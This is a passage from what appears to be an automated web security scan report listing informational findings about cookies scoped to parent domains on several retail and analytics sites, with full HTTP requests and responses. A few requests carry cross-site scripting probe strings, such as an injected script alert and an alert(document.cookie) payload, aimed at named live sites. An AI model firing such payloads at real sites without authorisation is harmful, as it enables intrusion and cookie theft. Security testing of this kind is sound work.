Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=22-662078189

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net
Content-Type: text/html
Content-Length: 30
Connection: close

<HTML><BODY>


</BODY></HTML>

12.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305510909785%7C1368582909785%3B%20s_lv%3D1305510909788%7C1400118909788%3B%20s_lv_s%3DFirst%2520Visit%7C1305512709788%3B%20s_vs%3D1%7C1305512709800%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E842E7051D1631-40000143C001ABA1[CE]; Expires=Sat, 14 May 2016 02:02:54 GMT; Domain=.brookstone.com; Path=/
Location: http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&pccr=true&vidn=26E842E7051D1631-40000143C001ABA1&&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 02:02:54 GMT
Last-Modified: Tue, 17 May 2011 02:02:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain


12.43. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s35472931402100

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543175232%7C1308135175232%3B%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20gpv_p6%3DHome%2520Page%7C1305544975234%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8810485163B23-40000183E0155674[CE]; Expires=Sat, 14 May 2016 10:52:57 GMT; Domain=.gnc.com; Path=/
Location: http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&pccr=true&vidn=26E8810485163B23-40000183E0155674&&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:52:57 GMT
Last-Modified: Tue, 17 May 2011 10:52:57 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www431
Content-Length: 0
Content-Type: text/plain


12.44. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /b/ss/gsicpet/1/H.20.3/s38054509394851

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1
Cookie: __utma=113636102.2132591238.1305543014.1305543014.1305543014.1; __utmb=113636102.1.10.1305543014; __utmc=113636102; __utmz=113636102.1305543014.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; mt.v=1.1280321277.1305543014584; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543014601%7C1308135014601%3B%20s_lastvisit%3D1305543014602%7C1400151014602%3B%20gpv_p27%3DHome%2520Page%7C1305544814603%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:50:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E880B4050116FC-60000108C015DA82[CE]; Expires=Sat, 14 May 2016 10:50:16 GMT; Domain=.petsmart.com; Path=/
Location: http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&pccr=true&vidn=26E880B4050116FC-60000108C015DA82&&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:50:16 GMT
Last-Modified: Tue, 17 May 2011 10:50:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain


12.45. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: o.toshibadirect.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B; s_pers=%20s_vnum%3D1308134480818%2526vn%253D1%7C1308134480818%3B%20s_invisit%3Dtrue%7C1305544280818%3B%20omtr_lv%3D1305542480819%7C1400150480819%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305544280819%3B%20s_nr%3D1305542480820%7C1308134480820%3B%20omtr_eVar45_cvp%3D%255B%255B'Referrers'%252C'1305542480823'%255D%255D%7C1463395280823%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544280824%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:41:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E87FB0051D141D-4000013200014B2A[CE]; Expires=Sat, 14 May 2016 10:41:36 GMT; Domain=.toshibadirect.com; Path=/
Location: http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&pccr=true&vidn=26E87FB0051D141D-4000013200014B2A&&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:41:36 GMT
Last-Modified: Tue, 17 May 2011 10:41:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www344
Content-Length: 0
Content-Type: text/plain


12.46. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

12.47. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

12.48. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

12.49. http://phoenix.untd.com/TRCK/RGST

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=249&TIME=720&RNS=ea07e739-24b7-4742-aa1e-439f2099de73 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:49 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=1855A_1:125DC3_0_1882A; expires=Thu, 13 May 2021 02:01:49 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

12.50. http://pix04.revsci.net/D05509/b3/0/3/noscript.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D05509/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D05509/b3/0/3/noscript.gif?D=DM_EVT%3Dbmuk_criteo HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
